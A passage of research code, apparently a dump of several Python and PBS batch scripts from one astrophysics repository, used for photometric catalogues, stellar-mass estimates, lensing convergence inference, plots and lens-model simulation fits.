rerr_CFHTLS[itrue]=float(lineorig.split()[75])\n i_CFHTLS[itrue]=float(lineorig.split()[79])\n ierr_CFHTLS[itrue]=float(lineorig.split()[80])\n y_CFHTLS[itrue]=float(lineorig.split()[84])\n yerr_CFHTLS[itrue]=float(lineorig.split()[85])\n z_CFHTLS[itrue]=float(lineorig.split()[89])\n zerr_CFHTLS[itrue]=float(lineorig.split()[90])\n if u_CFHTLS[itrue]==99.0:\n u_CFHTLS[itrue]=-99.0\n if uerr_CFHTLS[itrue]==99.0:\n uerr_CFHTLS[itrue]=-99.0\n if g_CFHTLS[itrue]==99.0:\n g_CFHTLS[itrue]=-99.0\n if gerr_CFHTLS[itrue]==99.0:\n gerr_CFHTLS[itrue]=-99.0\n if r_CFHTLS[itrue]==99.0:\n r_CFHTLS[itrue]=-99.0\n if rerr_CFHTLS[itrue]==99.0:\n rerr_CFHTLS[itrue]=-99.0\n if i_CFHTLS[itrue]==99.0:\n i_CFHTLS[itrue]=-99.0\n if ierr_CFHTLS[itrue]==99.0:\n ierr_CFHTLS[itrue]=-99.0\n if y_CFHTLS[itrue]==99.0:\n y_CFHTLS[itrue]=-99.0\n if yerr_CFHTLS[itrue]==99.0:\n yerr_CFHTLS[itrue]=-99.0\n if z_CFHTLS[itrue]==99.0:\n z_CFHTLS[itrue]=-99.0\n if zerr_CFHTLS[itrue]==99.0:\n zerr_CFHTLS[itrue]=-99.0\n for j in range(69):\n #print linepdz[i].split()[j+2], \"\\n\"\n #print [x[0:len(linepdz[i].split()[j+2])-1] for x in linepdz[i].split()[j+2]], \"\\n\"\n string=str(linepdz[i].split()[j+2])\n pofz[itrue][j]=float(string[:-1]) #because the last character is \",\"\n string=str(linepdz[i].split()[71])\n pofz[itrue][69]=float(string)\n i=i+1\n itrue=itrue+1\n check=\"true\"\n if check==\"false\":\n i=i+1\n #the code below is necessary to deal with the objects at the end of the file, if there are less than lepharenr objects left\n if i_CFHTLS[0]>0: # this is a drawback of the current code, in case the lephare input contains mixed i,y all entries are considered as i\n name_in=\"/Users/perseus/lephare_dev/test/izrgu_%s.cat\" % str(sys.argv[2])\n name_out=\"/Users/perseus/lephare_dev/test/izrgu_%s.cat.MAG_BC03_I09.lephareout\" % str(sys.argv[2])\n else:\n name_in=\"/Users/perseus/lephare_dev/test/yzrgu_%s.cat\" % str(sys.argv[2])\n name_out=\"/Users/perseus/lephare_dev/test/yzrgu_%s.cat.MAG_BC03_I09.lephareout\" % str(sys.argv[2])\n lephare_in = open(name_in,'w')\n lephare_in.write(\"# \\t ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t y \\t y_err \\t z \\t z_err \\t context \\t z-spec \\t string \\n\")\n list=[]\n for k in range(itrue): #create list of lists\n list.append([])\n for k in range(itrue):\n for j in range(70):\n if pofz[k][j]>0.001:\n list[k].append(j)\n if i_CFHTLS[0]>0:\n lephare_in.write('%s %s %s %s %s %s %s %s %s %s %s %s %s 47 %s\\n' % (len(list[k]),u_CFHTLS[k],uerr_CFHTLS[k],g_CFHTLS[k],gerr_CFHTLS[k],r_CFHTLS[k],rerr_CFHTLS[k],i_CFHTLS[k],ierr_CFHTLS[k],y_CFHTLS[k],yerr_CFHTLS[k],z_CFHTLS[k],zerr_CFHTLS[k],z[j]))\n else:\n lephare_in.write('%s %s %s %s %s %s %s %s %s %s %s %s %s 55 %s\\n' % (len(list[k]),u_CFHTLS[k],uerr_CFHTLS[k],g_CFHTLS[k],gerr_CFHTLS[k],r_CFHTLS[k],rerr_CFHTLS[k],i_CFHTLS[k],ierr_CFHTLS[k],y_CFHTLS[k],yerr_CFHTLS[k],z_CFHTLS[k],zerr_CFHTLS[k],z[j]))\n lephare_in.close()\n os.system(\"/Users/perseus/lephare_dev/test/runlephare_phys_para.sh %s\" % name_in)\n l=0\n with open('%s' % name_out) as lephare_out:\n lineout=lephare_out.readlines()\n for k in range(itrue):\n for j in range(len(list[k])):\n mass_best[k][list[k][j]]=float(lineout[62+l].split()[29])\n mass_inf[k][list[k][j]]=float(lineout[62+l].split()[30])\n mass_med[k][list[k][j]]=float(lineout[62+l].split()[31])\n mass_sup[k][list[k][j]]=float(lineout[62+l].split()[32])\n chigal[k][list[k][j]]=float(lineout[62+l].split()[5])\n chistar[k][list[k][j]]=float(lineout[62+l].split()[6])\n l=l+1\n outfile=open('%s_mstar.cat' % [x[0:len(listfields[0])-1] for x in listfields][count],'a')\n output=\"\"\n for k in range(itrue):\n output=output+name[k]+\"\\t\"\n for j in range(70):\n output=output+str(mass_best[k][j])+\"\\t\"+str(mass_inf[k][j])+\"\\t\"+str(mass_med[k][j])+\"\\t\"+str(mass_sup[k][j])+\"\\t\"+str(chigal[k][j])+\"\\t\"+str(chistar[k][j])+\"\\t\"\n output=output+\"\\n\"\n outfile.write(output)\n outfile.close()\n\n print(\"Total time for subfield: --- %s seconds ---\" % (time.time() - start_timesubfield))\n\nprint(\"Total time for field: --- %s seconds ---\" % (time.time() - start_timefield))\n\nprint 'Done!'\n\n" }, { "alpha_fraction": 0.6451612710952759, "alphanum_fraction": 0.6733871102333069, "avg_line_length": 13.588234901428223, "blob_id": "cb5b3062fbadda9b8283bea29f364c799723554c", "content_id": "617540c9bb3d16e706cbe7b2f3561ef428c0d0ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 248, "license_type": "no_license", "max_line_length": 36, "num_lines": 17, "path": "/python/scripts/NAOJ/batchtest.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Logb0.out\n#PBS -e Logb0.err\n#PBS -N 0\n#PBS -l mem=4gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/kappaplanes/\n\npython readtest.py\n" }, { "alpha_fraction": 0.5997056365013123, "alphanum_fraction": 0.6298748850822449, "avg_line_length": 33.846153259277344, "blob_id": "f438d888936898f1adab26b42fbc47523fe9ae9e", "content_id": "75ad7ad5330c5120c529da25d63c5d78459fce0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1359, "license_type": "no_license", "max_line_length": 108, "num_lines": 39, "path": "/python/catalogue_utilities/ascii_to_fitsHE0435.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# CE Rusu, July 22 2018\n# Reads an ascii file with multiple columns and converts it into a FITS file with same data types and header\n\nimport sys\nimport numpy as np\nimport fitsio # https://github.com/esheldon/fitsio\nimport astropy.table as table\nimport glob\nimport time\nimport collections\n\nroot = '/lfs08/rusucs/HE0435/'\nlist = glob.glob(root+'nobetaave3435NEWMEASUREDmedinject_ugriz_HE0435_GGL_los_8_*_45.cat')\nstart_time = time.time()\n#for i in range(1):\nfor i in range(len(list)):\n print list[i]\n headfile = open(list[i], 'r')\n head1 = headfile.readline()\n head2 = headfile.readline()\n head = False\n if head1.split()[0] == '#' and len(head1.split()[1:]) == len(head2.split()): # if there is a header\n head1 = head1.split()[1:] # ignore the # character\n head = True\n dict = collections.OrderedDict()\n for j in range(len(head2.split())):\n data = np.loadtxt(list[i],usecols=[j],unpack=True)\n if data.dtype == np.float64: type = 'float32'\n else: type = data.dtype\n if head == True:\n dict[head1[j]] = np.array(data, dtype=type)\n else:\n dict['col%s' %j] = np.array(data, dtype=type)\n del data\n t = table.Table(dict)\n del dict\n t.write('%s.fits' %list[i][:-4], overwrite = True)\n del t\nprint(\" Total time --- %s seconds ---\" % (time.time() - start_time))\n" }, { "alpha_fraction": 0.6634799242019653, "alphanum_fraction": 0.7648183703422546, "avg_line_length": 25.149999618530273, "blob_id": "9138b99c3de97f2e1885d0289dde8ad6f7e3d456", "content_id": "7da01ff8ac46ca41b115b45ff74dd2befb3e95f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 523, "license_type": "no_license", "max_line_length": 71, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim21.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log21s.out\n#PBS -e Log21s.err\n#PBS -N 21s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal oneoverr mass\npython inferkappasimbias.py WFI2033 5 120 23 meds gal oneoverr mass\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal oneoverr mass\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal oneoverr mass\n" }, { "alpha_fraction": 0.5144606828689575, "alphanum_fraction": 0.6138142347335815, "avg_line_length": 44.921875, "blob_id": "4c0ab31261eead9002490546d7d91af17012a844", "content_id": "d42d3d9acc045e982eb550b5b0c19961ed658c43", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2939, "license_type": "no_license", "max_line_length": 200, "num_lines": 64, "path": "/python/plot_utilities/plot_ReinReff.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "##########################\n# Simple code for scatter plot with y error bars.\n##########################\n\n#RXJ Rein=1.64 Reff=1.85 -> Rein/Reff=0.89 H0=78.2+/-3.4\n#J Rein=1.25 Reff=0.34 -> Rein/Reff=3.68 H0=68.9+/-5.2 (Simon confirmed it is circularized)\n#HE Rein=1.18 Reff=1.33 -> Rein/Reff=0.89 H0=71.7+/-4.6 (Ken confirmed circularized)\n#B Rein=0.85 (main galaxy) Reff=0.58 -> Rein/Reff=1.47 H0=71.0+/-3.1 (F814W. since the lens is spiral, filter is important)\n#WFI Rein=0.93 Reff=1.31, 1.44 -> Rein/Reff=0.71-0.0.65 H0=71.6+/-4.4\n#PG Rein=1.08 Reff=0.64 H0=81.1+/-7.5 (Chih-Fan)\n\nimport pylab as plt\nimport numpy as np\nax=plt.subplot(111)\n\nfig = plt.figure(figsize=(5,5))\nax1 = fig.add_subplot(1,1,1)\n#ax1.set(aspect=1)\nax1.set_aspect(1, adjustable='datalim')\n\nax = plt.subplot(1,1,1, sharex=ax1, sharey=ax1)\nBh = 71.0; Bhsup = 2.9; Bhinf = 3.3; Bein = 0.85; Beff = 0.58\nRh = 78.2; Rhsup = 3.4; Rhinf = 3.4; Rein = 1.64; Reff = 1.85\nHh = 71.7; Hhsup = 4.8; Hhinf = 4.5; Hein = 1.18; Heff = 1.33\nJh = 68.9; Jhsup = 5.4; Jhinf = 5.1; Jein = 1.25; Jeff = 0.34\nWh = 71.6; Whsup = 3.8; Whinf = 4.9; Wein = 0.93; Weff = 1.31\nPh = 81.1; Phsup = 8.0; Phinf = 7.1; Pein = 1.08; Peff = 0.64\nx = np.array([Bein/Beff, Rein/Reff, Hein/Heff, Jein/Jeff, Wein/Weff, Pein/Peff])\ny = np.array([Bh, Rh, Hh, Jh, Wh, Ph])\nysup = np.array([Bhsup, Rhsup, Hhsup, Jhsup, Whsup, Phsup])\nyinf = np.array([Bhinf, Rhinf, Hhinf, Jhinf, Whinf, Phinf])\n\n#x, y, yinf, ysup = np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/test/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forbpzspecz_specflag0_bpz.cat\", usecols=(9, 1, 2, 3), unpack=True)\n#x, y, yinf, ysup = np.loadtxt(\"bpzspeczeazy.cat\", usecols=(3, 0, 1, 2), unpack=True)\n#x = x[abs(y) <= zlim]\n#y = y[abs(y) <= zlim]\n#yinf = yinf[abs(y) <= zlim]\n#ysup = ysup[abs(y) <= zlim]\n#y = y[abs(x) <= zlim]\n#x = x[abs(x) <= zlim]\n#yinf = yinf[abs(x) <= zlim]\n#ysup = ysup[abs(x) <= zlim]\nax.tick_params(labelsize=14)\n#plt.scatter(x,y, color='k')\nplt.errorbar(x[0], y[0], yerr=[[yinf[0]], [ysup[0]]], fmt='o', label='B1608')\nplt.errorbar(x[1], y[1], yerr=[[yinf[1]], [ysup[1]]], fmt='o', label='RXJ1131')\nplt.errorbar(x[2], y[2], yerr=[[yinf[2]], [ysup[2]]], fmt='o', label='HE0435')\nplt.errorbar(x[3], y[3], yerr=[[yinf[3]], [ysup[3]]], fmt='o', label='J1206')\nplt.errorbar(x[4], y[4], yerr=[[yinf[4]], [ysup[4]]], fmt='o', label='WFI2033')\nplt.errorbar(x[5], y[5], yerr=[[yinf[5]], [ysup[5]]], fmt='o', label='PG1115')\n#ax.plot(x, m*x + b, '--')\nplt.xlabel('Rein/Reff')\n#plt.ylabel('phot-z')\nplt.ylabel('H_0')\n#plt.xlim(0, 3.5)\n#plt.ylim(0, 3.5)\n#plt.tick_params(labelbottom='off')\n#plt.title('HE0435 ugri specz-photz')\nplt.legend()\nplt.subplots_adjust(bottom=0.1, left =0.2, right=0.9, top=0.90, wspace=0, hspace=0)\n#plt.tight_layout()\n#fig.text(0.05, 0.5, 'photo-z', ha='center', va='center', size='20', rotation='vertical')\n#plt.title('HE0435 ugri specz-photz')\nplt.savefig('H0-Rein_over_Reff.png')\n" }, { "alpha_fraction": 0.6159624457359314, "alphanum_fraction": 0.6647887229919434, "avg_line_length": 29.428571701049805, "blob_id": "e0bf1b5253e656ec1c5ce3be024f3b88fd597a37", "content_id": "a8154681b03daf915890a4c9384b4a87945babd5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1065, "license_type": "no_license", "max_line_length": 151, "num_lines": 35, "path": "/python/plot_utilities/densityplotkappagamma.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# produces density plot for the MS catalogue Mhalo vs catalogue Mstar\n\nfrom matplotlib.colors import LogNorm\nimport scipy.optimize as optimization\nfrom pylab import *\nimport numpy as np\n\nfont = 10\nticksize = 10\n\nplt.clf()\nfig = plt.figure(figsize=(10,12))\n#fig, axes = plt.subplots(nrows=2, ncols=2)\n\nax1 = fig.add_subplot(1,1,1)\nax1.set_aspect(1)\nx, y = np.loadtxt(\"/Users/perseus/Desktop/GGL_los_8_0_0_0_0_N_4096_ang_4_Bower_galaxies_on_plane_27_to_63.imagesplot.txt\", usecols=(0, 2), unpack=True)\nzlim = 14.5\nzlim_ = 10\n#x = np.log10(x)\n#y = np.log10(y)\nx = x[(abs(y) <= zlim) & (abs(y) > zlim_)]\ny = y[(abs(y) <= zlim) & (abs(y) > zlim_)]\ny = y[(abs(x) <= zlim) & (abs(x) > zlim_)]\nx = x[(abs(x) <= zlim) & (abs(x) > zlim_)]\nhist2d(x, y, bins=[100, 100], norm=LogNorm())\nplt.xticks(rotation='vertical',size = ticksize)\nplt.yticks(size = ticksize)\ncolorbar()\ndelta = (y-x)/(1+x)\nplt.xlabel('Mhalo', fontsize=font)\nplt.ylabel('Mhalo (Behroozi)', fontsize=font)\nplt.xlim(zlim_, zlim)\nplt.ylim(zlim_, zlim)\nplt.savefig('/Users/perseus/Desktop/Bower.png' , dpi=250)\n" }, { "alpha_fraction": 0.6352829337120056, "alphanum_fraction": 0.7874464988708496, "avg_line_length": 62.727272033691406, "blob_id": "3c7ba93bd5cdba11c0a28bf98828d43e9b9255c8", "content_id": "a63a0fedf69c0ee0a0514ec87be2efcead312cbd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2103, "license_type": "no_license", "max_line_length": 117, "num_lines": 33, "path": "/python/scripts/NAOJ/batch3_insertstars.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Logb3.out\n#PBS -e Logb3.err\n#PBS -N 3\n#PBS -l mem=15gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_0_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_1_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_2_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_3_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_4_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_5_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_6_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_7_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_0_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_1_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_2_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_3_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_4_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_5_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_6_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_7_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\n" }, { "alpha_fraction": 0.589480459690094, "alphanum_fraction": 0.6481719017028809, "avg_line_length": 39.493507385253906, "blob_id": "6bee90e07e76fb6c58034330ab7cb28b983e58cb", "content_id": "08ee47cf8bbcc68246d1329bb7321710a6d2223a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3118, "license_type": "no_license", "max_line_length": 216, "num_lines": 77, "path": "/python/plot_utilities/plot_stellarmasserrbar.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "##########################\n# Simple code for scatter plot with xy error bars. Computes bias, scatter and fraction of outliers. Ignores the outliers when computing bias and scatter\n##########################\n\n\nfrom matplotlib.colors import LogNorm\nimport scipy.optimize as optimization\nfrom pylab import *\nimport numpy as np\nax=plt.subplot(111)\n#zlim = 1.0\noutlim = 0.15\n\nfig = plt.figure(figsize=(5,5))\nax1 = fig.add_subplot(1,1,1)\n#ax1.set(aspect=1)\nax1.set_aspect(1, adjustable='datalim')\n\nax = plt.subplot(1,1,1, sharex=ax1, sharey=ax1)\n#x_, y_, xinf_, xsup_, yinf_, ysup_ = np.loadtxt(\"rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassified.cat\", usecols=(62, 81, 61, 63, 80, 82), unpack=True)\nx_, y_, xinf_, xsup_, yinf_, ysup_ = np.loadtxt(\"rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslepharetphot.cat\", usecols=(62, 81, 61, 63, 80, 82), unpack=True)\nx = x_[(x_ > 0) & (y_ > 0)]\ny = y_[(x_ > 0) & (y_ > 0)]\nxinf = xinf_[(x_ > 0) & (y_ > 0)]\nyinf = yinf_[(x_ > 0) & (y_ > 0)]\nxsup = xsup_[(x_ > 0) & (y_ > 0)]\nysup = ysup_[(x_ > 0) & (y_ > 0)]\nax.tick_params(labelsize=14)\n#plt.scatter(x,y, color='k')\nplt.errorbar(x, y, xerr=[x-xinf, xsup-x], yerr=[y-yinf, ysup-y], fmt='o')\ndelta = (y-x)/(1+x)\n#delta = (y-(m+x))/(1+x)\nfirstpass_std = np.std(delta)\n#std = np.std(delta[abs(delta)<(4*firstpass_std)])\nstd = np.std(delta[abs(delta)<outlim])\nstdoutobj = \"%d objects\" % len(x)\nstdout = \"scatter = %.3f\" % std\n#out = 100.0*len(delta[abs(delta)>(4 * std)])/len(delta)\noutnr = len(delta[abs(delta)>outlim])\nout = 100.0*len(delta[abs(delta)>outlim])/len(delta)\noutlier = \"outliers = %d (%.2f %%)\" % (outnr,out)\n#bestfit = \"best-fit line = %.2f * x + %.2f\" % (m,b)\n#m, b = np.polyfit(x, y, 1)\nx = x[np.where(abs(delta)<outlim)]\ny = y[np.where(abs(delta)<outlim)]\ndef func(x, m):\n return m+x\nfit=optimization.curve_fit(func, x, y, np.array([0])) # the array contains the initial guesses\nm=fit[0][0]\nbias = \"bias = %.3f\" % m\nx = np.linspace(0, 20, 1000)\n#ax.plot(x, m*x + b, '--')\nax.plot(x, m+x, 'b--')\nax.plot(x, x, 'g')\nplt.plot(x, 0.85*x-0.15, 'r--')\nplt.plot(x, 1.15*x+0.15, 'r--')\nax.text(0.05, 0.95, stdoutobj, fontsize=15, color='black',transform=ax.transAxes)\nax.text(0.05, 0.90, stdout, fontsize=15, color='black',transform=ax.transAxes)\nax.text(0.05, 0.85, outlier, fontsize=15, color='black',transform=ax.transAxes)\nax.text(0.05, 0.80, bias, fontsize=15, color='black',transform=ax.transAxes)\n#ax.text(0.05, 0.80, bestfit, fontsize=15, color='black',transform=ax.transAxes)\nplt.xlabel('spec-z')\nplt.ylabel('phot-z')\n#plt.xlim(0, 3.5)\n#plt.ylim(0, 3.5)\nplt.xlabel('stellar mass')\nplt.ylabel('stellar mass w/ IRAC')\nplt.xlim(5, 12)\nplt.ylim(5, 12)\n#plt.tick_params(labelbottom='off')\n#plt.title('HE0435 ugri specz-photz')\n\nplt.subplots_adjust(bottom=0.1, left =0.2, right=0.9, top=0.90, wspace=0, hspace=0)\n#plt.tight_layout()\n#fig.text(0.05, 0.5, 'photo-z', ha='center', va='center', size='20', rotation='vertical')\n#plt.title('HE0435 ugri specz-photz')\nplt.savefig('stellarmass_errbartphot.png')\n" }, { "alpha_fraction": 0.6557239294052124, "alphanum_fraction": 0.7188552021980286, "avg_line_length": 41.42856979370117, "blob_id": "5da67546b8f2e295a7d8699264c314d73fd1bb7d", "content_id": "06b7eacc4a23577cc5155d6910133c669b07f44f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1188, "license_type": "no_license", "max_line_length": 86, "num_lines": 28, "path": "/python/plot_utilities/plot_symbolsonimage.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# used to plot Fig. 1 from Rusu et al. 2017\n\nfrom astropy.io import fits\nfrom matplotlib.colors import LogNorm\nimport matplotlib.pyplot as plt\nimport numpy as np\nplt.clf()\nstar = np.loadtxt(\"star.cat\",unpack=True)\nspecz = np.loadtxt(\"specz.cat\",unpack=True)\nphotz = np.loadtxt(\"photz.cat\",unpack=True)\nimage = fits.getdata(\"0435_scam_mar14_r_blk.fits\")\nimage[image<0]=0.0001\nmask = fits.getdata(\"mskHE0435_asecrad120_no5arcsec_blk.fits\")\nmask[mask!=0]=1\nplt.scatter(star[0]/2,star[1]/2,marker='*',facecolors='none', edgecolors='k')\nplt.scatter(photz[0]/2,photz[1]/2,marker='o',facecolors='none', edgecolors='k')\nplt.scatter(specz[0]/2,specz[1]/2,marker='s',facecolors='none', edgecolors='k')\nplt.imshow(image, cmap='gray_r', norm=LogNorm(), origin='lower', vmin=0.001, vmax=100)\nplt.imshow(mask, cmap='Oranges', origin='lower', alpha=0.2)\ncircle1 = plt.Circle((300,300),225/2.0,color='k',fill=False)\ncircle2 = plt.Circle((300,300),300,color='k',fill=False)\nfig = plt.gcf()\nfig.gca().add_artist(circle1)\nfig.gca().add_artist(circle2)\nfig = plt.gca()\nfig.axes.get_xaxis().set_visible(False)\nfig.axes.get_yaxis().set_visible(False)\nplt.savefig('FOV_small.png', dpi=300, bbox_inches='tight')\n" }, { "alpha_fraction": 0.5542213916778564, "alphanum_fraction": 0.5812382698059082, "avg_line_length": 43.94827651977539, "blob_id": "62c26c4d8d7b7f241bc314f5a8c881dcca4b46b2", "content_id": "9f6528d24f6e0dcc82d1c2ba3588150966a5ece3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2665, "license_type": "no_license", "max_line_length": 266, "num_lines": 58, "path": "/python/modeling_utilities/simulateandfit.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Given an image containing flux from a best-fit model and its generating hostlens configuration file, simulate similar images with noise, then fit them by starting from the correct input parameter values as initial guesses, and compute the scatter from these values\r\n\r\nimport numpy as np\r\nfrom astropy.io import fits\r\nimport os\r\n\r\nmodel = \"fixsersstars_sdfbFCSA00205330cutcutfliprotate_model.fits\"\r\nsky = 2250 # value efore sky subtraction\r\nskyrms = 25 # measured on empty sky regions of the original image with imexam\r\n\r\nimage = fits.open(model)\r\ndata = image[0].data + sky\r\nsims = 10\r\nout = np.zeros((sims,np.shape(data)[0],np.shape(data)[1]))\r\n\r\nfor i in range(sims):\r\n out[i] = np.random.poisson(abs(data)) - sky + np.random.normal(0,25,size=(np.shape(data)[0],np.shape(data)[1]))\r\n image[0].data = out[i].astype(\"float32\")\r\n image.writeto(model[:-5]+\"_noise%s.fits\" % str(i),clobber=True)\r\n\r\nfor i in range(sims):\r\n os.system(\"cp %s %s\" % (model[:-11] + \"_file.input\",model[:-11] + str(i) + \"_file.input\"))\r\n with open(model[:-11] + str(i) + \"_file.input\", 'r') as f:\r\n hostlens = f.readlines()\r\n hostlens[1 - 1] = \"obsfits %s\" % (model[:-5]+\"_noise%s.fits\" %str(i)) + \"\\n\"\r\n hostlens[5 - 1] = \"prefix %s\" % (model[:-11] + str(i)) + \"\\n\"\r\n hostlens[22 - 1] = \"dump_model 0\" + \"\\n\"\r\n with open(model[:-11] + str(i) + \"_file.input\", 'w') as f:\r\n f.writelines(hostlens)\r\n f.close()\r\n if i == 0: # identify the variables\r\n var = []\r\n with open(model[:-11] + str(i) + \"_file.input\", 'r') as g:\r\n hostlens = g.readline()\r\n while hostlens:\r\n hostlens = g.readline()\r\n if (len(hostlens.split()) >= 3) and (hostlens.split()[0].isdigit() == True) and (hostlens.split()[2] == '1'):\r\n var.append(float(hostlens.split()[1]))\r\n\r\nexecute = \"\"\r\nfor i in range(sims):\r\n if i < sims - 1: execute += \"hostlens %s & \" % (model[:-11] + str(i) + \"_file.input\")\r\n else: execute += \"hostlens %s \" % (model[:-11] + str(i) + \"_file.input\")\r\nos.system(execute)\r\n\r\nfitted = np.zeros((sims,len(var)))\r\nfor i in range(sims):\r\n fit = []\r\n with open(model[:-11] + str(i) + \"_file.input\", 'r') as g:\r\n hostlens = g.readline()\r\n while hostlens:\r\n hostlens = g.readline()\r\n if (len(hostlens.split()) >= 3) and (hostlens.split()[0].isdigit() == True) and (hostlens.split()[2] == '1'):\r\n fit.append(float(hostlens.split()[1]))\r\n fitted[i] = fit\r\n\r\nprint \"Standard deviations from given values:\"\r\nprint np.sqrt(np.std(fitted,axis=0,ddof=1)**2 + (var-np.mean(fitted,axis=0))**2)\r\n" }, { "alpha_fraction": 0.491203635931015, "alphanum_fraction": 0.5523427724838257, "avg_line_length": 79.9000015258789, "blob_id": "a3e29dc37f192f893d8f1f1b6986f9d2c0131660", "content_id": "8b7189d82ed1bfca36b7d90966a5a237506669e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5741, "license_type": "no_license", "max_line_length": 231, "num_lines": 70, "path": "/python/modeling_utilities/vary.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Randomly varies the input parameters for Hostlens, then delects all outputs except for the one with minimum chi^2\r\n\r\nimport sys\r\nimport os\r\nimport numpy as np\r\n\r\nfile = \"ylens_out_file.input\"\r\nprefix_out = \"ylens_out\"\r\nvary = 100\r\n\r\ndef string(hostlens):\r\n return \" \" + hostlens.split()[2] + \" \" + hostlens.split()[3] + \" \" + hostlens.split()[4] + \" \" + hostlens.split()[5] + \"\\n\"\r\ndef stringunit(hostlens): # for lines that end with e.g. \"[arcsec]\"\r\n return \" \" + hostlens.split()[2] + \" \" + hostlens.split()[3] + \" \" + hostlens.split()[4] + \" \" + hostlens.split()[5] + \" \" + hostlens.split()[6] + \"\\n\"\r\n\r\nfor i in range(vary):\r\n with open(file, 'r') as f:\r\n hostlens = f.readlines()\r\n hostlens[5 - 1] = \"prefix %s%s\" % (prefix_out,str(i + 1)) + \"\\n\"\r\n# psf + sky\r\n line = 30; x = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(0.8,0.2))) + stringunit(hostlens[line - 1]); hostlens[line - 1] = x # FWHM1\r\n line = 31; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(0.1,0.05))) + string(hostlens[line - 1]) # e1\r\n line = 32; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (np.random.uniform(0,360)) + stringunit(hostlens[line - 1]) # PA1\r\n line = 33; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + 